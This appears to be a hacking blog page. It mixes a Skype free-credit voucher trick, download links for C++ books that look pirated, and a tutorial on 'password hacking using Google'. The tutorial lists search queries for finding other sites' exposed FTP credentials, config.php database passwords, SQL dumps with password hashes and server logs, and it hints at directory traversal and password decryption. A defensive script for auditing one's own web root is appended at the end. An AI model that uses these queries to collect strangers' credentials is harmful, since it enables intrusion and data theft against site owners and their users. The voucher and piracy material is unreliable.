1. Download the VPN and connect to it.
Click here to Download

2. After connecting, open the link given below.
http://skype.hotspotshield.com/banner.php


3. Press OK on the free voucher code; that will give you a voucher code.
4. Complete this step, log in to your Skype account, enter the voucher code, and the credit will be added to your account.




0 Let Us C++ By Yashwant Kanetkar



And I am damn sure that you can easily understand it, because this book is also user friendly.


By rUsTlEs xEr0

No doubt Yashwant Kanetkar is a great author; he has written this book on C++.

So Click Here to download this book....


0 C++



By rUsTlEs xEr0

If you guys are curious to find a nice book on C++, then you don't need to go anywhere, because here is a bundle of awesome books on C++, and it will obviously help you build skills in C++.
Click Here to download bundle....


0 Hack Google with Google Hacks



By rUsTlEs xEr0

I earlier blogged about some cool Google dorks to search around, but it required precision and a bit of memorising capability (which I suppose we all are lacking nowadays :P). Here comes the rescue tool for the lazy - Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use Google as a proxy. As the website itself says, Google Hacks is "A compact utility for several google hacks". Although it's not as good as Gooscan, a far superior tool to scan for vulnerabilities in web, it's well worth a try.
Google Hacks is well worth a shot; however, I will be posting about better tools. You can download Google Hacks from the link given below.
Download Google Hacks


0 Advanced password hacking using Google – easy to learn, easy to apply




Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same: query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of Google dorks.
Let's start, shall we?
FTP passwords
ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.
intitle:index.of ws_ftp.ini
You can also use this dork, which uses "parent directory" to avoid results other than directory listings
filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"
Even if the site or file has been taken offline, you can still search the contents in the Google cache using the following dork
"cache:www.abc.com/ws_ftp.ini"
where
www.abc.com is the site you want to check the dork for.
The ws_ftp password uses quite a weak encryption algorithm; hence once you get the password, you can break it using the decryptor provided here or from here.
PHP Hacking
Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the SQL database the site is hosting. This password is required only once per transaction (i.e. whenever the admin logs in or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in the index file.
intitle:index.of config.php
To view PHP file contents
intitle:"Index of" phpinfo.php
You can also try the directory traversal attack in PHP using the following dork
inurl:download.php?=filename
If you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint: if you are not able to find it, try looking for globals.php).
Most websites today deny this trick, but you may get lucky with some :)
SQL Dumps
We will be hunting for SQL password dumps saved in databases. Here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the MD5 hash for 123456, one of the most common passwords people keep, and the intext dork allows searching inside the dump.
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password
Remember kids
  1. Use different email providers: substitute gmail/yahoomail for somemail, or try custom domain mail providers.
  2. Use different file extensions.
  3. Use different types of hashes; some older ones might be using MD4 and some others might be using other prominent encryption algorithms.
  4. Just mix everything up and try different combinations :)

It's not over.. yet
A very flexible query can be used to hunt for WS_FTP.log, which in turn can disclose valuable information about the server.
+htpasswd +WS_FTP.LOG filetype:log
You can substitute "+htpasswd" for "+FILENAME" and you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like
phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet
The list goes on and on.. Also you can try this dork to data mine information about the uploader
"allinurl: "some.host.com" WS_FTP.LOG filetype:log"
which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance
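
Every dork in this post works only because a file that should not be public sits under the document root, or because a directory without an index page is listed. The audit below is an added example, not part of the original post, for running against your own web root before a crawler finds the same things; the file names come from the post, while the index file names, the `config.php` copy pattern and the sample tree are assumptions.

```python
import fnmatch
import os
import tempfile

# File name patterns named in the post (matched case-insensitively).
SENSITIVE_PATTERNS = [
    ("ws_ftp.ini", "FTP client profile with weakly encoded passwords"),
    ("ws_ftp.log", "FTP transfer log naming uploaders and paths"),
    (".htpasswd", "password file inside the document root"),
    ("phpinfo.php", "phpinfo page discloses server configuration"),
    ("*.sql", "database dump served as a static file"),
    ("*.mdb", "Access database served as a static file"),
    # Assumption: editor/backup copies such as config.php.bak or config.php~
    # are not parsed as PHP and are returned as plain text.
    ("config.php?*", "copy of config.php that the server will not execute"),
]
# Assumption: any of these prevents an automatic directory listing.
INDEX_NAMES = {"index.php", "index.html", "index.htm", "default.asp"}


def audit_webroot(webroot):
    """Return sorted (relative path, reason) findings for one document root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        lowered = {name.lower() for name in filenames}
        if not INDEX_NAMES & lowered:
            findings.append((rel_dir, "no index file: listed if directory listing is on"))
        for name in filenames:
            for pattern, reason in SENSITIVE_PATTERNS:
                if fnmatch.fnmatchcase(name.lower(), pattern):
                    findings.append((os.path.normpath(os.path.join(rel_dir, name)), reason))
                    break
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample document root with placeholder file contents."""
    layout = [
        "index.php", "config.php", "config.php.bak",
        os.path.join("uploads", "WS_FTP.LOG"),
        os.path.join("uploads", "ws_ftp.ini"),
        os.path.join("backup", "index.html"),
        os.path.join("backup", "dump.sql"),
    ]
    for rel in layout:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"constructed placeholder\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for path, reason in audit_webroot(root):
            print(f"{path}: {reason}")
```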


 
